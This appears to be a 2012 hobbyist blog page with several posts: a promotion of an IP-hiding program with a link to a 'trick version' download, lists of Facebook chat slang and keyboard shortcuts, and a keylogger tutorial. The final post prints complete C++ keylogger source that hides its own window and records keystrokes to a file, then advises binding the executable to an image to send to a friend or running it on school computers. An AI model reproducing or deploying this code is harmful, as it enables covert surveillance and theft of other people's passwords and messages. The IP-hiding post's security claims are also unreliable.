Pages

Wednesday, January 25, 2012

"Hide The IP" best IP hiding software tool

As i said Internet is less secure medium, you have to hide your identity from intruders/attackers.( Using Internet, hackers can steal your confidential data like credit card number, bank account, facebook accounts.) One of the identity is IP address. When you visit website, it may store your IP Address . Using your IP address anyone hack your computer. So it is important to hide your IP address. 

Today let me introduce a IP hiding software, named as "Hide the IP" 


Hide the IP

Hide the IP is best IP hiding software. One simple click, your IP address will be hidden and show some fake IP address , surf anonymously over the internet. Now hackers can't find your original IP address. 

Features of Hide the IP
  • Select your physical Location: You can decide your region. Your IP will be set based on your country selection
  • Send Anonymously Mail: while sending email , your IP also included in Header section of mail. This "Hide The IP "software will hide IP in your mail header also.
  • Breaking restrictions: is your IP banned to register in any forums ? Some websites restricts certain country region. Using this software you can break the restrictions and register or visit websites
  • you can install in 2 computers. But you can not use simultaneously.

how it works?
when you run the application, it connects to their server and get the new and stable IP address.

There is three different plans(standard, professional, plantinum) . 

Download trick version here

All Facebook Chat Slang Codes

All Facebook Chat Slang Codes
Slang’s have become very common in chat’s,Sms,emails.People new  to these slang’s find really difficult to understand converstion.On the other hand it saves a lot of time and effort if slang’s are used.I will give the most commonly used Slangs with there meanings that are used in facebook chat or Sms.

Here are the Most Commonly used Facebook chat slang’s
ASAP    As Soon As Possible
GN         Good Night
M/F       Are You Male or Female?
ASL        Tell me your Age,Sex and Location
IDK        I don’t Know
SD           Sweet Dreams
BRB        Be Right Back
JK            Just Kidding
Tnx        Thanks
BTW       By The Way
K               Okay
TY           Thank You
ROFL      Rolling on Floor Laughing
LOL         Laugh out Loud
TTYL     Talk to you later
FYI          For Your Information
LMAO    Laugh My Ass Out
WTF        What The F**k
FB             Facebook
LMFAO     Laugh my f**king ass off
WTH      What the hell
GM          Good Morning
LMK       Let Me Know
zzz          Sleeping
BFF        Best Friends Forever
Jk           Just kidding
B4          Before
L8          Late
gr8        great
plz        please
sry       sorry
bbz       babes
kk         okay
kl          cool
This List is far from Complete but it has the most commonly used slang codes in facebook chat.If I missed some then do share them with our readers by posting comments.

Keyboard Shortcuts For Facebook



Keyboard Shortcuts For Facebook
If you spend a lot of time on facebook then why not spend it more efficiently.There are a lot of browser specific keyboard shortcuts for facebook.You can create new messages,view account settings,View notifications etc .Once you get familiar with these shortcuts you can easily navigate on facebook.In this post I will give the shortcut keys for Google Chrome,Firefox and Internet Explorer.
Here is a comprehensive list of facebook Shortcuts for each browser.

Google Chrome Facebook Shortcuts

  • Alt+1: View your News Feed
  • Alt+2: View your own Profile
  • Alt+3: View pop-up of friend requests
  • Alt+4: View pop-up of messages
  • Alt+5: View pop-up of notifications
  • Alt+6: View Account Settings
  • Alt+7: View Privacy Settings
  • Alt+8: View Facebook’s own profile
  • Alt+9: Read latest Terms of Service agreement.
  • Alt+?: Search
  • Alt+m: Compose a new message
If you are using Firefox browser then you also need to press SHIFT along with the above shortcut keys.

Firefox Facebook Shortcuts

  • Shift+Alt+1: View your News Feed
  • Shift+Alt+2: View your own Profile
  • Shift+Alt+3: View pop-up of friend requests
  • Shift+Alt+4: View pop-up of messages
  • Shift+Alt+5: View pop-up of notifications
  • Shift+Alt+6: View Account Settings
  • Shift+Alt+7: View Privacy Settings
  • Shift+Alt+8: View Facebook’s own profile
  • Shift+Alt+9: Read latest Terms of Service agreement.
  • Shift+Alt+0: Open Facebook Help Center
  • Shift+Alt+?: Search
  • Shift+Alt+m: Compose a new message
If you are using Internet Explorer then you you can use the Facebook shortcuts of Google chrome,but you have to press ENTER after each shortcut .

How to create Keylogger using Visual C++?

How to create Keylogger using Visual C++?
Requirements:
Dev C++.  Download it from here: http://www.bloodshed.net/
Knowledge about Visual C++(need, if you are going to develop the code).

Install dev C++ in your system and open the dev C++ compiler.
Go to File->New->Source File.
you can see a blank works space will be there in window.
now copy the below keylogger code into the blank work space.
#include <iostream>
using namespace std;
#include <windows.h>
#include <winuser.h>
int Save (int key_stroke, char *file);
void Stealth();

int main()
{
Stealth();
char i;

while (1)
{
for(i = 8; i <= 190; i++)
{
if (GetAsyncKeyState(i) == -32767)
Save (i,"LOG.txt");
}
}
system ("PAUSE");
return 0;
}

/* *********************************** */

int Save (int key_stroke, char *file)
{
if ( (key_stroke == 1) || (key_stroke == 2) )
return 0;

FILE *OUTPUT_FILE;
OUTPUT_FILE = fopen(file, "a+");

cout << key_stroke << endl;

if (key_stroke == 8)
fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]");
else if (key_stroke == 13)
fprintf(OUTPUT_FILE, "%s", "\n");
else if (key_stroke == 32)
fprintf(OUTPUT_FILE, "%s", " ");
else if (key_stroke == VK_TAB)
fprintf(OUTPUT_FILE, "%s", "[TAB]");
else if (key_stroke == VK_SHIFT)
fprintf(OUTPUT_FILE, "%s", "[SHIFT]");
else if (key_stroke == VK_CONTROL)
fprintf(OUTPUT_FILE, "%s", "[CONTROL]");
else if (key_stroke == VK_ESCAPE)
fprintf(OUTPUT_FILE, "%s", "[ESCAPE]");
else if (key_stroke == VK_END)
fprintf(OUTPUT_FILE, "%s", "[END]");
else if (key_stroke == VK_HOME)
fprintf(OUTPUT_FILE, "%s", "[HOME]");
else if (key_stroke == VK_LEFT)
fprintf(OUTPUT_FILE, "%s", "[LEFT]");
else if (key_stroke == VK_UP)
fprintf(OUTPUT_FILE, "%s", "[UP]");
else if (key_stroke == VK_RIGHT)
fprintf(OUTPUT_FILE, "%s", "[RIGHT]");
else if (key_stroke == VK_DOWN)
fprintf(OUTPUT_FILE, "%s", "[DOWN]");
else if (key_stroke == 190 || key_stroke == 110)
fprintf(OUTPUT_FILE, "%s", ".");
else
fprintf(OUTPUT_FILE, "%s", &key_stroke);

fclose (OUTPUT_FILE);
return 0;
}

/* *********************************** */

void Stealth()
{
HWND Stealth;
AllocConsole();
Stealth = FindWindowA("ConsoleWindowClass", NULL);
ShowWindow(Stealth,0);
}

Compile the Code(Ctrl+F9)


Now execute the program by selecting Execute->Run(ctrl+F10)

now your keylogger will run in your system. whatever you type using keyboard. It will be stored in Log.txt file.
you can see the log.txt file where you save the file.



bind the exe file with image or any files and send it to your friend.
(0r)
if you have physical access to your college/school system,then copy the exe file in that system and run it.